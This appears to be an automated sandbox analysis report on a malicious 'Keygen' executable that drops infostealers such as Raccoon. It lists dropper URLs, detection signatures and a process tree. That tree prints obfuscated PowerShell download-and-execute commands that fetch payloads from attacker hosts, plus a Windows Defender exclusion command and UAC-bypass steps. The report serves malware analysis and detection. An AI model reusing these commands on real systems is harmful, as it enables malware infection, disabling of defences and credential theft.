Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    159s
  • max time network
    183s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (22) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 23:29:11 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (534 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 52 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (22) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (22) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\17B5.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (22) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1808
      • C:\Users\Admin\AppData\Local\Temp\17B5.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1844
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\17B5.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1592
          • C:\Users\Public\giw.exe
            "C:\Users\Public\giw.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2408
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2492
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Checks processor information in registry
                PID:2604
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2604 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\828048335394263\\* & exit
                  8⤵
                    PID:2912
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2604
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2660
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2524
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2652
              • C:\Users\Public\giw.exe
                "C:\Users\Public\giw.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2552
                • C:\Users\Admin\AppData\Local\Temp\HIXkedTQxn.exe
                  "C:\Users\Admin\AppData\Local\Temp\HIXkedTQxn.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1684
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\HIXkedTQxn.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2184
                • C:\Users\Admin\AppData\Local\Temp\r6chkrHkfn.exe
                  "C:\Users\Admin\AppData\Local\Temp\r6chkrHkfn.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Modifies system certificate store
                  PID:2036
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2588
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:2140
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:1164
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:2812
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            10⤵
                              PID:2328
                            • C:\Windows\SysWOW64\reg.exe
                              reg delete hkcu\Environment /v windir /f
                              10⤵
                              • Modifies registry key
                              PID:1928
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c C:\Users\Public\Natso.bat
                            9⤵
                              PID:2592
                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                            8⤵
                              PID:2216
                          • C:\Users\Admin\AppData\Local\Temp\QEmGu52VXT.exe
                            "C:\Users\Admin\AppData\Local\Temp\QEmGu52VXT.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:2436
                            • \??\c:\windows\SysWOW64\cmstp.exe
                              "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\525yjejr.inf
                              8⤵
                                PID:1836
                            • C:\Users\Admin\AppData\Local\Temp\Msbz19BSGM.exe
                              "C:\Users\Admin\AppData\Local\Temp\Msbz19BSGM.exe"
                              7⤵
                              • Executes dropped EXE
                              • Windows security modification
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2136
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" Get-MpPreference -verbose
                                8⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1088
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\giw.exe"
                              7⤵
                                PID:1968
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:2932
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\17B5.tmp\m1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:556
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1604
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout 1
                        3⤵
                        • Delays execution with timeout.exe
                        PID:568
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\17B5.tmp\b.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1936
